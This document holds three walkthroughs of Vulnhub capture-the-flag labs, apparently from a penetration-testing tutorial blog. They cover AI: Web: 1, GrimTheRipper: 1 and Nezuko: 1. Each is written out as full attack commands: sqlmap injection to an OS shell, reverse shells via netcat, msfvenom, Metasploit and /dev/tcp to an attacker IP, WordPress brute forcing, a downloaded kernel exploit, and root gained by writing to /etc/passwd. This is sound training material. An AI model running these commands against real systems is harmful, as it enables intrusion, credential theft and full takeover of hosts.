AI: Web: 1 Vulnhub Walkthrough

AI: Web: 1 Vulnhub Walkthrough

Today we are going to solve another CTF challenge called “AI: Web: 1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. The credit for making this lab goes to Mohammad Ariful. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on Vulnhub Website. We will be downloading the lab from this link.

Penetration Testing Methodology

Network Scanning

·        Netdiscover

·        Nmap

Enumeration

·        Browsing HTTP Service

·        Directory Bruteforce using dirb

·        SQL Injection to find Credentials

Exploitation

·        SQL Injection to invoke OS-Shell

Privilege Escalation

·        Writable etc/passwd file

Walkthrough

Network Scanning

NOTE: For this Lab we will have to put the Network Setting of our Attacker Machine (Kali Linux) to NAT.

We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command tot check the IP Address of the lab.

netdiscover

This was found out to be 192.168.13.131.

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.13.131

We learned from the scan that we have the port 80 open which is hosting Apache httpd service. We also gained the information about a robots.txt file, /m3diNf0/, /se3reTdir777/uploads directory available to enumerate.

Since we got the port 80 open, we decided to browser the IP Address in the browser. It shows the following text” Not even Google search my contents!”.

Let’s browser another page which we got in our port scan. When we open the /m3diNf0/ in our browser we get a Forbidden Message as shown in the given image.

During our port scan, we found another directory named /se3reTdir777/uploads/. Let’s try to browser it. On opening it in our Web Browser, we get a similar Forbidden Message as earlier.

To further enumerate, we performed a Directory Bruteforce on the m3diNf0 directory. This gave us an info.php page as shown in the given image. This could be of some use.

dirb http://192.168.13.131/m3diNf0/

After finding the info.php page in the Directory bruteforce, we tried to browse this page on our browser. It opened up as shown in the given image. We will keep this aside as it gives us some valuable information for further.

Previously we tired to open the se3reTdir777/uploads. Now, we tried to browse the se3reTdir777 directory. It gives us a User ID Submission Form as shown in the image given below.

We tried to further enumerate the form by entering the “User ID” in the form, It tell us that there is an injection vulnerability here. We extracted the following information from it.:

Id                           : 1

First Name          : admin

Last Name           : admin

Now we entered User ID as 1 and captured the ongoing packet using BurpSuite. We did this because we are going to need it in the exploiting the SQL Injection through sqlmap.

We copied the request captured and created a text file and pasted it. We named the it req.txt. We will be using this request to exploit the SQL Injection. After working for a while, sql map extracted the “aiweb1” database as shown in the image given below.

sqlmap -r req.txt -D aiweb1 --dbs --batch

Now, to further enumerate, we used the --dump-all parameter. This will allow the sqlmap tool to dump all the data that it can find while exploiting the SQL Injection on our target machine.

sqlmap -r req.txt -D aiweb1 –dump-all  --batch 

After running the sqlmap with --dump-all parameter we get the usernames and encrypted passwords as shown in the image given below.

We copied the password form the terminal here and tried to decode them using the BurpSuite Decoder. After decoding, we have the following credentials.

Id	Username	Password
1	t00r	FakeUserPassw0rd
2	aiweb1pwn	MyEvilPass_f908sdaf9_sadfasf0sa
3	u3er	N0tThisOneAls0

Now that we have the credentials, we will try to invoke an os-shell using the sqlmap tool. Here we provided the Database name with the –os-shell as a parameter for sqlmap. After performing the exploitation, it gives us the option to choose the web application language which it supports. Here we are choosing PHP.

sqlmap -r req.txt -D aiweb1 –os-shell

Following the choice of the web application language we are asked if we want to provoke the full path disclosure. Here, we do want the full path so we answer yes. Now it asks the attacker the writable directory to be used for os shell. We chose the custom location.

Now we will use the info.php page that we found earlier. On a close inspection we found the Document Root for this particular server. We found it to be “/home/www/html/web1x443290o2sdf92213”.

So, in order to get the os shell, we will be entering this document root location into our custom location as shown in the image given below. And we got our os-shell on the target machine.

After getting the os shell, we ran the id command to check the user of which the shell is generated, Also, we tried to check if the /etc/passwd file is readable or not. It was readable. But this seemed like a dead end.

os-shell > id

os-shell > cat /etc/passwd

  

So, we went back to the sqlmap result. It showed us a link” /se3reTdir777/uploads/tmputvpz.php”. On opening we have the upload page as shown in the image given below. We can see that we have the browse button where we can choose the path of our file and provide the path on the victim system, the location we want the file to save.

We decided we will upload a php shell on this upload page. So, we edited the script to add the IP Address of out attacker machine.

We directed the path of the php shell and click on upload button. After clicking we see the message as shown in the given image

Now that we have successfully uploaded the shell file, it’s time to run the php file by browsing the file on the web browser as shown in the given image But we should run a .

As soon as we ran the shell, we got the shell in the netcat we started earlier.  This gave us an improper shell; we will use the python one liner to convert it into proper shell. After getting the proper shell we will traverse into tmp directory. Here, we will use the LinEnum script to further enumerate the target machine as shown in the image given below.

nc -lvp 1234

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@aiweb:/$ cd /tmp

www-data@aiweb:/$ wget http://192.168.13.132:8000/LinEnum.sh

www-data@aiweb:/$ chmod 777 LinEnum.sh

www-data@aiweb:/$ ./LinEnum.sh

Here on a closer inspection we can see that we have the read/ write sensitive files as /etc/passwd.

As we have the /etc/passwd file writable, we will add a user in it with elevated privileges. To do this we will create the hash of that user using the openssl command. Here we created a user with salt user3, username as raj and password pass123.

openssl passwd -1 -salt user3 pass123

Now that we have the password hash let’s add our newly created user in the /etc/passwd file of the target machine. We did this using the echo command. Now let’s login as the new user. After that we traversed to the root directory to find the flag.txt as shown in the image given below.

www-data@aiweb1:/tmp$ echo ‘raj:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash’ >>/etc/passwd

www-data@aiweb1:/tmp$ tail /etc/passwd

www-data@aiweb1:/tmp$ su raj

www-data@aiweb1:/tmp$ cd /root

www-data@aiweb1:~# ls

www-data@aiweb1:~# cat flag.txt

II Method

We can solve the lab using another method as well. For this we will use the Metasploit Web Delivery payload. We created one with out attacker machine’s IP Address and server port. On running exploit, we will get a script as shown in the image given below.

msf5 > use exploit/multi/script/web_delivery

msf5 exploit(multi/script/web_delivery) > set lhost 192.168.13.132

msf5 exploit(multi/script/web_delivery) > set srvport 4567

msf5 exploit(multi/script/web_delivery) > exploit

We will run the script in the OS Shell we invoked earlier as shown in the image.

This gave us a meterpreter on the target machine as shown in the image given below

msf5 exploit(multi/script/web_delivery) > session 1

meterpreter > sysinfo

III Method

We could also solve this lab in yet another method, but this time we will use msfvenom for our exploitation. We will create an exploit using msfvenom using the payload cmd/unix/reverse_python. This generated a python script as shown in the image.

msfvenom -p cmd/unix/reverse_python lhost=192.168.13.132 lport=9876 R

Again, let’s get back to out OS Shell to enter the script we generated using msfvenom. We will execute the script as shown in the image given below.

Before executing we will run a netcat listener to capture the session generated through the python script. We have the shell over our target machine form this method too.

nc -lvp 9876

id

whoami

IV Method

We will try to get the shell over the target machine using another method. In this method we can execute the msfvenom generated script from the previous method. Now instead of running the netcat to capture the shell we will use Metasploit’s multi/handler. We will set the payload, IP Address and lport and run the exploit command. Now we will run the msfvenom generated script to give us the shell. Now we will use the convert shell into meterpreter.

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload cmd/unix/reverse_python

msf5 exploit(multi/handler) > set lhost 192.168.13.132

msf5 exploit(multi/handler) > set lport 9876

msf5 exploit(multi/handler) > exploit

msf5 exploit(multi/handler) > sessions -u 1

msf5 exploit(multi/handler) > sessions 2

meterpreter > sysinfo

GrimTheRipper: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “GrimTheRipper: 1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to Manish Chandra. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

·        Netdiscover

·        Nmap

Enumeration

·        Browsing HTTP Service

·        Directory Bruteforce using dirb

·        Enumerating Webpage using View Page Source

·        Decoding Base64 Hints

·        Browsing Hidden Directories

Exploiting

·        Bruteforcing using wpscan

·        Using Metasploit wp_admin_shell_upload exploit

Privilege Escalation

·        Enumerating for Linux Version

·        Searching and Getting Kernel Exploit using Searchsploit

·        Compile and run the Kernel Exploit

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover

This was found out to be 192.168.0.8.

Now we will run an aggressive scan using nmap for proceed further.

nmap -A 192.168.0.8

From its result, we found ports 22(SSH), 80(HTTP) were open.

Enumeration

For more detail we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.

 We obtained an image of Kevin Hart as shown in the given below image.

As this proved out to be a dead end, we tried to further enumerate the target machine through a directory Bruteforce. For this we are going to use the dirb tool. This gave us a page named “index2”.

On opening it in our browser we get this message “You lost dumb shit??” along with another meme.

But we felt something fishy with this image. So, we viewed the Page Source of the image. This gave us a clue which was commented as shown in the given image.

On the first view, it seemed to be Base64 Encoding. So, we tried decoding it as shown in the given image below. On first decoding we are given another Base 64 encoded message “Try Harder”. So we decoded it again to get a binary code.

echo ‘THpFd0f1UQXhNREU9IHRyeSBoYXJk’ | base64 -d

echo ‘LzEwMTAxMDE=’ | base64 -d

We tried to decode this binary code but it was worthless.  So, we tried to use this as a possible directory. On opening it we got the wordpress directory as shown in the image given below.

So, we opened the wordpress directory, It was looking like a normal wordpress site. But we couldn’t find anything suspicious from the first view.

Exploiting

So, to proceed further, we took the help of wpscan to bruteforce into the admin panel.

wpscan --url http://192.168.0.8/1010101/wordpress/ -U /usr/share/wordlists/rockyou.txt

Here we got through the bruteforce and got the credentials for the login:

Username: admin

Password: Password@123

Note: The password that was extracted starts from ‘P’ and rockyou.txt is alphabetical arranged so it takes a lot of time to crack.

Now that we have the login credentials, let’s get the shell through the wp_admin_shell_upload in Metasploit. First, we with the help of use command we will select the exploit in Metasploit Framework. After that we will select the Remote host IP Address, followed by the username and password that we extracted earlier and after that we will use exploit command to run the exploit. Here, we have ran the exploit multiple time because it doesn’t get through single time. We have to apply multiple times as we did.

use exploit/unix/webapp/wp_admin_shell_upload

set rhosts 192.168.0.8

set username admin

set password Password@123

set targeturi /1010101/wordpress/

exploit

Now that we have the meterpreter, we ran the shell command to get the bash shell on the target system. Form this we got the improper shell, which we converted into a proper shell using the python one liner. After we had the proper shell, we ran the lsb_release command to get the information about the Linux version on the target machine. It found out to be 12.04 as shown in the image.

shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

lsb_release -a

Now, that we have the Ubuntu Version, we decided to escalate privilege using a Kernel Exploit. We used the searchsploit for this. We selected the exploit and download it using -m parameter of the searchsploit command. After downloading the exploit, we ran the python script to host the current directory on port 8000 as shown in the given image. We did this to transfer the exploit onto the target system.

searchsploit Ubuntu 12.04

searchsploit -m 37292

python -m SimpleHTTPServer

Now that we have hosted the exploit on the HTTP server, let’s download the exploit on the target system using the wget command. After downloading, we compiled the exploit using gcc to get the executable file which we named shell. After that we will provide proper privilege to the shell file and execute it to get the root shell as shown in the given image.

wget http://192.168..0.10:8000/37292.c

 gcc 37292.c -o shell

chmod 777 shell

./shell

id

Nezuko: 1 Vulnhub Walkthrough

Today we are going to solve another CTF challenge called “Nezuko: 1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to yunaranyancat. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

·         Netdiscover

·         Nmap

Enumeration

·         Browsing HTTP Service

·         Browsing Webmin Service

·         Enumerating Webmin Service

Exploiting

·         Exploiting Remote Code Execution Vulnerability

·         Get Shell

·         Enumerate for Flag

Privilege Escalation

·         Readable /etc/passwd file

·         Cracking hash using John The Ripper

·         Creating reverse bash script using msfvenom

·         Editing script scheduled to auto run

·         Get Escalated Shell

·         Enumerate for flag

Capture the flag

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover

This was found out to be 192.168.1.105.

Now we will run an aggressive scan using nmap for proceed further.

nmap -A 192.168.1.105

From its result, we found ports 22(SSH), 80(HTTP), 13337(MiniServ) were open.

Enumeration

For more detail we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.

 We obtained an image of Nezuko anime character as shown in the given below image.

This webpage turned out to be a waste of time as we were not being able to extract anything from here. It’s time to explore other ports. Next one in our port scan was 13337. So we browsed to that port and it gave us the login panel of Webmin as shown in the image.

Exploiting

As we were not able to get out hands on credentials in our initial enumeration. We will have to figure out a different way to get through this Authorization Login Panel of Webmin. In our initial port scan, we figured out that our target machine is running the Webmin Version 1.920. So we used the searchsploit to search for any available exploits.

searchsploit Webmin 1.920

This gave us the Remote Code Execution(RCE) Exploit. Now let’s download this exploit script using the -m parameter of the searchsploit command.

searchsploit -m 47293

Now let’s read the contents of the exploit as well understand the usage of the exploit.

cat 47293.sh

 

We saw that the exploit checks the Vulnerability through the RCE and returns the arguments “Vulnerable “or “Target is not Vulnerable”. But we want to gain a remote shell on target system. So we modified the exploit script to generate a netcat session from the target machine as shown in the image. We renamed the file to “shell.sh” as it is easier to remember than “47293”.

nano shell.sh

nc -e /bin/bash [Attacker IP] [Port] 

Here, we have the IP Address of our Attacker Machine (Kali Linux) is 192.168.1.106.

Now, let’s execute the shell script with the target IP address and Port as parameters. But before executing this shell script, we will initiate a netcat listener to receive the reverse shell.

sh shell.sh https://192.168.1.105:13337

 

We started this netcat listener as discussed earlier. And as the shell script was executed we got an improper shell of the target machine. We used the python one-line to convert it into a proper shell.

nc -lvp 1337

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

We can see that we have got the shell as the user Nezuko. We enumerated further using the ls command. This gave us that we have a directory named “from_zenitsu” as well as a text file named nezuko.txt. When we further investigated we saw that a message is received every 5 minutes. As the directory is named “from_zenitsu”, we assumed that there must be a user by that name.

cd

ls

cd from_zenitsu

ls

But let’s also open the nezukto.txt file. It is our first flag. Now we will have to escalate privilege on this machine.

cat nezuko.txt

Privilege Escalation

We were looking for a user named zenitsu, so we thought to check if the /etc/passwd file is readable or not. It was readable. And we found a user named zenitsu as shown in the given image.

cat /etc/passwd

We used the John The Ripper to crack the password hash of the user zenitsu. As shown in the image, it is “meowmeow”.

john hash --show

Now, as we have the credentials of the user zenitsu, let’s traverse to that user.

su zenitsu

We entered the password “meowmeow” as shown in the image.

cd

ls

cd to_nezuko

ls –la send_message_to_nezuko.sh

Now it’s time to enumerate this user as well. Here, on close inspection, we found a directory named “to_nezuko”. In this directory, we found the script that sends those messages to nezuko. We checked the permission of the script and found out that it runs with elevated privileges.

Now we created a reverse bash shell using the msfvenom, as shown in the given image to get a root shell on the target machine. We choose the format of payload to be Raw. We did this so that we can have the script available to us as shown in the given image.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.106 lport=1234 R  

We used the echo command as the zenitsu user, to edit the send_message_to_nezuko.sh file. We altered our shell code in the script. Now as we observed earlier, this script gets executed every 5 minutes. So we will wait for it to execute.

echo “0<&60-;exec 60<>/dev/tcp/192.168.1.106/1234;sh <&60 >&60 2>&60” >> 

send_message_to_nezuko.sh

In order to receive the shell, we started a netcat listener on the port that we mentioned while creating the payload. And after waiting for 5 minutes, we have the shell, here we found the root.txt. This was our final flag.

nc -lvp 1234

id

cd /root

ls

cat root.txt

This was a good lab that made us understand some important aspects of scheduled tasks between users on a same machine. As well as to exploit a Webmin Panel.